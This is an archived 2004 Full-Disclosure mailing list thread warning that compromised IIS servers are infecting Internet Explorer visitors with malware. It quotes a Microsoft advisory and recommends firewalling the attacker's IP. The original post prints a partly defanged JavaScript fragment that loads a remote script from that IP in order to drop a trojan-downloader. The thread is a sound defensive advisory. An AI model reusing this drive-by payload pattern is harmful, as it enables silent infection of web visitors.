lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
From: mvp at joeware.net (joe)
Subject: New malware to infect IIS and from there jump to clients

For the IIS side....

http://www.microsoft.com/security/incident/download_ject.mspx
 


Microsoft teams are investigating a report of a security issue affecting
customers using Microsoft Internet Information Services 5.0 (IIS) and
Microsoft Internet Explorer, components of Windows.

Important  Customers who have deployed Windows XP Service Pack 2 RC2 are not
at risk.

Reports indicate that Web servers running Windows 2000 Server and IIS that
have not applied update 835732, which was addressed by Microsoft Security
Bulletin MS04-011, are possibly being compromised and being used to attempt
to infect users of Internet Explorer with malicious code.






-----Original Message-----
From: full-disclosure-admin@...ts.netsys.com
[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Peter Kruse
Sent: Thursday, June 24, 2004 7:22 PM
To: full-disclosure@...ts.netsys.com
Subject: [Full-Disclosure] New malware to infect IIS and from there jump to
clients

Hi all,

This is a heads up.

A new malware has been reported from several sources so it appears to be
fairly widespread already.

The malware spreads from infected IIS servers to clients that visit the
webpage of the infected server. How the IIS servers was compromised in the
first place is unfortunately still unknown (any info on that would be
appreciated).

The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does
so by running a javascript that apparently gets appended to several files in
the webfolder of IIS (eg. html, .txt, .gif). The webpage loads http://
217.107.218.147/xxx.html that contains the following code:

<script language="Javascript">

    function InjectedDuringRedirection(){
     ?showModalDialog('md.htm', window, "dialog
Top: -10000\;dialogLeft:-10000\;dialog Height :1\;dialog Width
:1\;").location= " java script:'<SCRIPT  SRC =\\' http://
217.107.218.147/shellxxx.js\\'> <\ /script>'";

[snip - you get the picture, right?]

I had to put in some spaces to get past trivial content filtering.

>From that point it will try to run the malware in a 1x1 dialogbox in the
following order:

shellscript_loadxxx.js
shellxxx.js

The shellxxx.js will try to drop "msits.exe" (51.712 bytes) a
trojan-downloader and run it.

Consider to deny access to http://217.107.218.147 in your firewall. This
will at least prevent client PCs from getting infected.

Further information can be found in the daily log from SANS:
http://isc.sans.org/

Regards
Peter Kruse
http://www.csis.dk

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ